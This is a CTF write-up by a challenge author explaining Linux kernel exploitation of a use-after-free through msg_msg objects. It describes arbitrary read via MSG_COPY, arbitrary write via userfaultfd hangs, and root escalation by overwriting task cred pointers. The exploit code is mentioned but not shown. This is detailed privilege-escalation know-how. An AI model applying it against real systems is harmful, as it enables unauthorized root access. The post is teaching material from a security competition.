In corCTF 2021, D3v17 and I wrote two kernel challenges utilizing a technique that is novel at least to our knowledge to gain arb read and arb write in kernel land: Fire of Salvation and Wall of Perdition. A famous kernel object often abused for heap sprays is the msg_msg struct, which is an elastic kernel object meant for IPC purposes (System V message queues) that has a size ranging from the kmalloc 64 to the kmalloc 4k. There was also a recent CVE exploit writeup by Linux kernel developer and security researcher Alexander Popov in which he abused msg_msg for arb read in his exploit for CVE-2021-26708. D3v17 and I read this, and posed the question to ourselves, is it possible to achieve arbitrary write in this across any valid slab for msg_msg? After a week or two of digging around, not only did we discover a way to achieve arb write on kmalloc 4k slabs, but we also discovered a way to do this for any valid msg_msg slab. In this post, I'll detail the Fire of Salvation writeup, which covers arb write on kmalloc 4k slabs. I'll also provide a tldr with the insights for any valid msg_msg arb write with a summary of my approach for the second challenge, but D3v17 will detail that out in his post for Wall of Perdition. Since this writeup is quite long, feel free to let me know of any unclear explanations or mistakes.
In this challenge, the following key protections were enabled on a 5.8 kernel: FG-KASLR, SLAB_RANDOM, SLAB_HARDENED, and STATIC_USERMODE_HELPER. The SLAB allocator was also being used, with a corresponding kernel.config file provided with all the extra other tidbits and miscellaneous hardening options (such as enabling the userfaultfd syscall, hardened_usercopy, CHECKPOINT_RESTORE, etc.). SMAP, SMEP, and KPTI being on was a given. Also, since our goal was to introduce players to a novel exploitation technique, we didn't really care much about the reversing procedure to find a bug, and didn't want to complexify the bug. In our discussions, we decided to just make the bug a pretty obvious UAF that limits them to around 0x28 to 0x30 of UAF write. (no UAF read). This was the source we provided to all the players (we were also nice enough to give out a vmlinux with debug symbols and structs):
To summarize, a simple firewall driver was created, with a separate array for inbound rules and outbound rules (confined to ipv4). From userland, people can interact with the netfilter hooks via a misc device, using the user_rule_t struct, which gets transfered to the rule_t struct to go into the kmalloc-4k slab. Each rule is allocated in the array via kzalloc, and contains information about rule name, interface name, IP address, port, the action to take, the protocol (TCP or UDP), a duplication flag, and a large buffer for description which one cannot modify after allocating it. Most of these fields have validity checks (actions are only limited to DROP or ACCEPT), and add, edit, and delete rule are both safe. The only bug is in duplicate, which duplicates a rule from inbound to outbound or vice versa; an obvious UAF scenario occurs when you duplicate a rule from array 1 to array 2, and then delete it from one array without deleting it from the other.
Exploitation wise, there are a few serious roadblocks that would prevent common exploit paths and necessitate the need for good arb read and arb write primitivies. The fact that it is using the SLAB allocator means that no freelist pointer will be on the chunks themselves (and even if they were, they probably won't be within the 0x30 UAF region as the Linux kernel have moved them down for certain slabs). FG-KASLR will complicate the ability to overwrite function pointers (such as the one on the sk_buff struct's destructor arg callback in the CVE writeup), as most gadgets not in the earlier parts of .text will be affected; ROP is still possible, but I believe that would entail first arb reading the ksymtab for the function for whichever the gadget is relative to. Lastly, with STATIC_USERMODE_HELPER
(and its path set to “”), the classic SMAP bypasses of targeting modprobe_path or core_pattern no longer work. The path itself is now located in a read only section of the kernel according to readelf. At this point, the most direct way to then bypass SMAP is to probably arb read the doubly linked list of task structures to find the current task, and overwrite the cred pointer to one that would give us root privileges. A physmap spray would be another common approach, but that's just painful.
Do note again that the vulnerability only gives a small window of UAF write, without UAF read. Once you allocate a few chunks to help smooth out the SLAB shuffling on the current slab, we can begin the exploitation procedure. Let's first take a detour into msg_msg (these manpages
can be quite helpful). I do consistently use the IPC_NOWAIT option to avoid hangs and a msgtyp of zero to pull from the front of the msg_queue. For reference, here is the msg_msg struct
In our case, the security pointer will always be null, since there is no SELinux.
Looking at do_msgsnd
Before enqueing this msg onto the specified message queue, load_msg
is called to usercopy data into the chunk.
Note how it calls alloc_msg
to allocate space on the kernel heap for the incoming message beforehand.
msg_msgseg is simply a struct that has a next pointer with data following immediately afterwards. Both DATALEN_MSG and DATALEN_SEG are basically page size minus the size of their respective structs, so their maximum size fits exactly in the kmalloc 4k slabs. Once you send in larger messages, a linked list is created. The maximum size of a message is determined by /proc/sys/kernel/msgmax, and its default is 8192 bytes (so you can get a linked list of 3 elements at most).
Now, let's take a look at do_msgrcv
If MSG_COPY flag is set (which is availble with CONFIG_CHECKPOINT_RESTORE), it calls prepare_copy, which is just a wrapper around load_msg to prepare a copy (interestingly enough, doesn't using that make it also usercopy whatever is in the userland buffer for recieving into the allocated copy first?). Without that flag, it simply traverses the queue and will unlink the msg after finding it with find_msg. Otherwise an unlink doesn't happen. copy_msg
is called, and data is transferred to the copy via a memcpy (note the memcpy, this is very important!).
If no errors have happened yet, it reaches the msg_handler call, which is actually do_msg_fill if you trace the code path from the call to do_msgrcv. do_msg_fill
is basically a wrapper around
, which does the following:
Basically, it traverses the linked list structure of the msg_msg object, and uses usercopy to bring the desired message back to userspace. Then, do_msgrcv calls free_msg
, which frees the linked list structure in order (starting from head, then next, etc.).
Now, let us think about abusing a UAF over these elastic objects for arb read and arb write. By modifying the next pointer or the size, arb read via msg_msg should be quite trivial, except for the fact that unlinking it from the queue (unless you can somehow skip modifying the first few qwords which you can't in this challenge) would destroy it. You can try to modify size so maybe it can leak more data from the next segment of the msg_msg object, but hardened usercopy would stop you dead in your tracks. However, this is where MSG_COPY comes into play. Not only does it not unlink your message, but it also uses memcpy for the initial copying of data! So now, we can happily modify the next pointer and change the m_ts field. This technique has already been documented in Popov's CVE writeup. The only restriction is that your next segment has to start with a null qword to avoid kernel panics or having it go somewhere you do not want it to go to.
How would we approach arb write then? This is where every Linux kernel exploit developer's good friend userfaultfd comes back (rip to the new unprivileged userfaultfd settings from 5.11 and forwards). During the msgsnd process, if you manage to have a UAF over the first part of the msg_msg object, you can have it copy over data for a message request that requires more than just one allocation. Then, if you abuse userfaultfd to hang the copy right before it pulls the value of the next pointer (such as when it's a few bytes away from copying everything into the first chunk), you can use the UAF to change this next pointer, and you can achieve arbitrary write once you release the hang! Of course, just like arb read, this requires the target region to start with a null qword. To make this clearer, take a look at the following diagram:
Now with an understanding of both primitives, what will the exploitation path be from where we left off? Well, as I discussed in my hashbrown writeup
from diceCTF, to get a kernel base leak with FG-KASLR on, we need to rely on pointers into kernel data as those are not affected. It's as simple as just spraying a ton of shm_file_data objects in kmalloc-32 (which has pointers to kernel data such as in the init_ipc_ns field), and allocate a msg_msg such that it will take up a 4k slab and a kmalloc-32 slab as its next segment that is under our UAF's control. Then we can expand the size (without causing it to traverse more than once), and use MSG_COPY to get a OOB read in the kmalloc 32 slabs and achieve leaks. Of course, before we do that, we have to make sure our data sent via the ioctl follows the format (ip, netmask, etc.), but that is trivial to implement.
Then, we can re-abuse this arb read to read the task_struct linked list starting from init_task. Since our exploit is probably the latest process running on a generally idle qemu system, we can just walk from prev and hit our task_struct pretty quickly. While a normal trick to find offsets in task_struct is to use prctl SET_NAME to set the comm member (as ptr-yudai detailed in his Google CTF Quals 2021 Fullchain writeup
), we provided vmlinux with debugging symbols and structs. The task doubly linked list is located at an offset of 0x298, with a consistently null qword beforehand, the pid is at offset 0x398 (which is close enough for this region to be treated as a single msg segment), while the real_cred and cred pointers are at offset 0x538 and 0x540, also luckily with a nice null qword beforehand.
Once we find the current process based on the pid in task structs, we can just arb write to the real_cred and cred pointer, replacing them with init_cred and effectively pwning the system.
Here is my exploit for reference:
With this exploit, you can reliably pop a root shell and allow us to read the flag:
For some reason, musl wasn't working well with threads on the qemu, so I had to use gcc static. Luckily, upx packer managed to cut the size down by more than 60%, though that is still much larger than a musl compiled exploit. Congratulations to Maher
for taking the unofficial post-CTF first blood on this challenge. A shout-out goes to team SuperGuesser as well, I heard they were quite close to solving during the CTF as well.
As for the Wall of Perdition challenge, I will only provide a brief summary of my solution, which I believe might slightly differ from D3v17's. His post on this part will be much more detailed, with many more diagrams to come.
In this second part, the sizes are limited to kmalloc-64; I wasn't aware of any commonly known abusable structures in this range. While arb read is still quite trivial thanks to MSG_COPY, using it to get a kernel base leak with FG-KASLR is not as easy. Arb write becomes even harder as well.
To get the same shm_file_data kernel leak, I first allocated two message queues, and I would like to find the address of one of them (I will call this one front queue). Finding its address is easy, as we can just spray msg_msg structs in the same queue (beware that there is a limit set by /proc/sys/kernel/msgmnb that defaults to 16384 bytes total per queue), and abuse OOB read via MSG_COPY to check for known msg_msg contents from the spray.
This leak will be useful to avoid crashes and prematurely stop the traversal in the msg_msg queue linked list during do_msgrcv when MSG_COPY isn't set. Then I sprayed more msg_queue allocations, and sent in a message for each, as I am trying to look for a message and queue I can reach with the OOB read from the front queue in kmalloc 64 slabs. From here, I can send in a msg_msg object that chains a 4k chunk with a kmalloc 32 chunk into this target queue, and leak its address based on OOB reading the linked list structures of its previous kmalloc 64 msg_msg object.
At this point, we have to pray that the qword before that 4k chunk is null. If so, replacing the next pointer of the UAF'd chunk in the front queue to that location will allow us to get the address of the kmalloc 32 chunk. After spraying many more shm_file_data objects, we can just expand the msg_msg struct under our UAF's control to a much larger size, replace this very object's next pointer to the address of the kmalloc 32 chunk, and just dump huge portions of the kmalloc 32 with MSG_COPY for a kernel base leak. From here on out, arb reading the task struct to find the current struct is pretty much the same as in the previous exploit.
Now, for arb write, I reused the target queue earlier, cleared the large msg out from it, and replaced it with a msg_msg object that has two 4k chunks in its chain (this is getting quite close to the default msg_msg size limit). I can abuse the previous technique to then leak the address of this new 4k msg_msg object along with the address of its msg segment. Then, I freed this large object with msgrcv (and we will get them back in the order of leaked segment address and then the leaked msg_msg object due to LIFO). I msgsnd again a size of a message that requires two 4k chunks, and hang it with userfaultfd on load_msg, and quickly arb free its segment via the msg_msg under UAF control in the front queue via msgrcv. No crashes will occur since I fixed its pointers to go right back to the front queue itself.
Upon this arb free primitive, I send another message in another message queue that was previously allocated; it will also be hanged when reading in userland data. The object will just be of enough size to cover a 4k chunk (to get back the last freed chunk due to LIFO) chained with a small segment linked along. I let the data transfer from the original hang to continue, which gives me the ability to overwrite the next pointer of the currently allocated msg_msg object, thereby giving me arb write once I let this second hang continue and finish off. This might seem quite insane, but I promise you that D3v17's blogpost
will make this quite clear with his diagrams.
Here is my final exploit, which only had about a 50% success rate.
Running this remotely should eventually give us root privs and the flag:
Congratulations to jass93 of RPISEC
for taking the unofficial post-CTF first blood on this challenge. The player didn't exactly go down the intended route of abusing an arb free primitive, but rather went on to abuse the unlinking mechanism in msgrcv, which seems quite powerful too. Overall, D3v17 and I learned a lot from developing these challenges, and believe that these primitives will be quite applicable on most kernel versions given a somewhat sizeable UAF. The changing in default unpriviledged userfaultfd permissions definitely deprecate these primitives, and the potential idea of a SLAB quarantine
mechanism would render this technique pretty much useless for non 4k slab sizes due to its reliance on LIFO behavior. Another really interesting kernel hardening measure we accidentally stumbled upon was usercopy whitelisting
, in which slab regions have whitelists on what usercopy can interact with. Luckily, fallback is enabled by default and on most Linux distros, but if it was enabled, our SMAP bypass methodology would have failed. Thankfully modprobe_path and core_pattern still exists, but we wonder what other SMAP bypass techniques would be just as simple and elegant. Hopefully, you would have learned a lot from this writeup, and make sure to read D3v17's in depth and amazing writeup for Wall of Perdition
Post a Comment